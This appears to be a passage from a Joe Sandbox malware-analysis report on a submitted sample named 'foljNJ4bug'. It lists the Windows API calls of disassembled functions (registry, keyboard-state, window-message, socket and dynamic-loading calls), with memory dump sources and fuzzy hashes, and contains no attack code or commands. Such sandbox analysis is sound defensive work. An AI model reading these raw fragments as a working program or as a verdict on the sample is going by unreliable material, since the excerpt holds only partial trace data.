                                                                                                                                              • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2027346449-0
                                                                                                                                              • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                                              • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                                              • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                                              • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                              • GetMenu.USER32 ref: 0047A703
                                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                                              • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                                              • _wcslen.LIBCMT ref: 0047A79E
                                                                                                                                              • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                                              • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3257027151-0
                                                                                                                                              • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                                              • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                                              • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                                                                                              • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                                              APIs
                                                                                                                                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLastselect
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 215497628-0
                                                                                                                                              • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                                                              • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                                              • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                                                              • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                                                              APIs
                                                                                                                                              • GetParent.USER32(?), ref: 0044443B
                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                                              • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                              • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                              • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                                              • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                              • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                                              APIs
                                                                                                                                              • GetParent.USER32(?), ref: 00444633
                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                                              • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                              • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                              • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                                              • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                              • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                                              • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2354583917-0
                                                                                                                                              • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                              • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                                              • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                              • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                                                                              • String ID: #v
                                                                                                                                              • API String ID: 2449869053-554117064
                                                                                                                                              • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                              • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                                              • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                                              • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                              • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                                              • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                              • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                                              APIs
                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 896007046-0
                                                                                                                                              • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                              • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                                              • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                              • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                                              • GetFocus.USER32 ref: 00448ACF
                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3429747543-0
                                                                                                                                              • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                              • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                                              • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                              • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                              • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                              • String ID: %lu$\VH
                                                                                                                                              • API String ID: 3164766367-2432546070
                                                                                                                                              • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                              • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                                              • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                              • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                                              • API String ID: 3850602802-3636473452
                                                                                                                                              • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                              • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                                              • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                              • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3985565216-0
                                                                                                                                              • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                                              • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                                                              • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                                              • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                                                              APIs
                                                                                                                                              • _malloc.LIBCMT ref: 0041F707
                                                                                                                                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                              • _free.LIBCMT ref: 0041F71A
